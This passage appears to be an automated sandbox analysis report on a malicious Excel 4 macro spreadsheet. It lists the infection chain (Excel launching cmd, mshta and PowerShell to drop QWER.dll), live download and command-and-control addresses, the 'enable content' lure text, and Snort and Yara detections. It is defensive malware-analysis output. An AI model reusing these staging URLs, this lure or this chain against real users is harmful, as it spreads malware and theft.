Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\cmd.exe
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80
Source: global traffic, DNS query: name: kuyporn.com

                            Networking

                            Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80
                            Source: global traffic HTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1 Host: 91.240.118.168 Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1 Host: kuyporn.com Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1 Host: jeffreylubin.igclout.com Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 557056 Connection: keep-alive Keep-Alive: timeout=15 Date: Fri, 28 Jan 2022 20:24:48 GMT Server: Apache Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 28 Jan 2022 20:24:48 GMT Content-Disposition: attachment; filename="NsLUiuT.dll" Content-Transfer-Encoding: binary Set-Cookie: 61f451108e964=1643401488; expires=Fri, 28-Jan-2022 20:25:48 GMT; Max-Age=60; path=/ Last-Modified: Fri, 28 Jan 2022 20:24:48 GMT X-Frame-Options: SAMEORIGIN
                            Source: global traffic HTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.168 Connection: Keep-Alive
                            Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
                            Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox View IP Address: 207.148.81.119 207.148.81.119
                            Source: Joe Sandbox View IP Address: 104.131.62.48 104.131.62.48
                            Source: unknown Network traffic detected: IP country count 15
                            Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm
                            Source: unknown DNS traffic detected: queries for: kuyporn.com
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            System Summary

                            Source: 80_513972285.xls, Macro extractor: Sheet: Macro1 contains: mshta
                            Source: 80_513972285.xls, type: SAMPLE, Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders, Author: ditekSHen
                            Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED, Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders, Author: ditekSHen
                            Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4, Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G
                            Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 :: Previewing is not available for protected documents. 14 15 Yo
                            Source: Screenshot number: 8, Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G) I I 23 24 25 26
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\ProgramData\QWER.dll
                            Source: 80_513972285.xls, Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034777B9_2_0034777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003527539_2_00352753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003518319_2_00351831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003428309_2_00342830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034B8219_2_0034B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003608679_2_00360867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003568649_2_00356864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E86A9_2_0034E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C8509_2_0034C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003488F49_2_003488F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D8D79_2_0035D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003468DE9_2_003468DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F93D9_2_0034F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003419509_2_00341950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003509469_2_00350946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034194C9_2_0034194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C9A99_2_0035C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003599AA9_2_003599AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003619939_2_00361993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346A1F9_2_00346A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349A7D9_2_00349A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CA439_2_0034CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AB669_2_0034AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00361B549_2_00361B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354B569_2_00354B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BB4B9_2_0034BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347B829_2_00347B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00352BF69_2_00352BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035EBFF9_2_0035EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357BCA9_2_00357BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346C299_2_00346C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034EC9B9_2_0034EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CC899_2_0035CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035ACD39_2_0035ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350D339_2_00350D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BD0F9_2_0034BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358D719_2_00358D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00360D5B9_2_00360D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00353D419_2_00353D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348D959_2_00348D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034FD8C9_2_0034FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035EE949_2_0035EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AE9A9_2_0034AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035BE8C9_2_0035BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346ED69_2_00346ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035FF319_2_0035FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00343FB89_2_00343FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342FA19_2_00342FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00341F9B9_2_00341F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CFCE9_2_0034CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004374DD10_2_004374DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004270ED10_2_004270ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00435CF910_2_00435CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043BE8C10_2_0043BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043EE9410_2_0043EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042EC9B10_2_0042EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043E49810_2_0043E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00441B5410_2_00441B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042970010_2_00429700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043351210_2_00433512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042F93D10_2_0042F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043B39110_2_0043B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00428D9510_2_00428D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042CA4310_2_0042CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042E24310_2_0042E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043504010_2_00435040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042C85010_2_0042C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042865010_2_00428650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0044086710_2_00440867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043686410_2_00436864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042E86A10_2_0042E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043026B10_2_0043026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0044146E10_2_0044146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0044367210_2_00443672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00429A7D10_2_00429A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042B41A10_2_0042B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043561F10_2_0043561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00426A1F10_2_00426A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042B82110_2_0042B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043A42910_2_0043A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00426C2910_2_00426C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043542E10_2_0043542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043183110_2_00431831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042283010_2_00422830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043363D10_2_0043363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043ACD310_2_0043ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00426ED610_2_00426ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043D8D710_2_0043D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004404DE10_2_004404DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004268DE10_2_004268DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004364F110_2_004364F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004288F410_2_004288F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004244FA10_2_004244FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042608310_2_00426083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043CC8910_2_0043CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042AE9A10_2_0042AE9A
